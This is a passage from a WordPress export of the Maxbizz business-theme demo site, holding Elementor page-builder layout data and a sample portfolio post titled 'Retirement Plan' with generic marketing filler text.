		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"f40b9b0","elType":"section","settings":{"structure":"20","background_background":"classic","background_color":"#1F2238","padding":{"unit":"px","top":"110","right":"0","bottom":"110","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"32bca0e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"bf3cf87","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"d186df0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"fcb9632","elType":"widget","settings":{"title":"about us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8921794","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#AFC1CE","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"30d8f28","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#52C5B6","icon_secondary_color":"#FFFFFF","icon_primary_color":"#13364F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":true},{"id":"1eb9096","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"9f422e8","elType":"widget","settings":{"title":"Head office","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d17acaa","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"5b725a2","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"9ff98c2","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b6ef71d","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"3b3bd0c","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20"},"elements":[{"id":"c82c7d2","elType":"column","settings":{"_column_size":50,"_inline_size":61,"_inline_size_tablet":50},"elements":[{"id":"e3ac00d","elType":"widget","settings":{"title":"our location","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3160db4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/map-footer-home5.png","id":2141},"image_size":"full","align":"left","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"eb5ea23","elType":"column","settings":{"_column_size":50,"_inline_size":39},"elements":[{"id":"ab76595","elType":"widget","settings":{"title_text":"London","description_text":"+5-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"2af4006","elType":"widget","settings":{"title_text":"Tokyo","description_text":"+3-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"de9425d","elType":"section","settings":{"background_background":"classic","background_color":"#1F2238"},"elements":[{"id":"5c90953","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"7456be1","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"0bb002f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"23f3334","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#879DAD","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:11:"text-editor";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:2;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:5;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:5;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:5;s:16:"description_text";i:5;s:8:"position";i:5;s:10:"title_size";i:5;s:13:"selected_icon";i:5;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:5;s:9:"icon_size";i:5;s:6:"rotate";i:5;s:10:"icon_space";i:5;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:5;s:27:"title_typography_typography";i:5;s:26:"title_typography_font_size";i:5;s:28:"title_typography_font_weight";i:5;s:33:"description_typography_typography";i:5;s:32:"description_typography_font_size";i:5;s:34:"description_typography_font_weight";i:5;s:11:"title_color";i:5;s:28:"title_typography_font_family";i:5;s:17:"description_color";i:5;s:34:"description_typography_font_family";i:5;s:17:"text_align_mobile";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:3;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:2;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Retirement Plan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/retirement-plan/</link>
		<pubDate>Fri, 11 Sep 2020 04:29:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=797</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>July 02, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>797</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:29:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:29:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[retirement-plan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"60e1ac27","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4c36af66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"4e2f2262","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1e19bf7","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"5fceea31","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"365148c8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"56ce4a9","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"62b7915","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7940adfb","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2711c64d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"10bfada8","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"366a5c36","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"229cd6e2","elType":"widget","settings":{"editor":"<p>July 02, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"460b2861","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3bd9565","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"1171a95e","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"671086a6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6801bcf2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"eb7fa0f","elType":"section","settings":[],"elements":[{"id":"328e1fc","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"649e1b7","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f991655","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2571397","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your 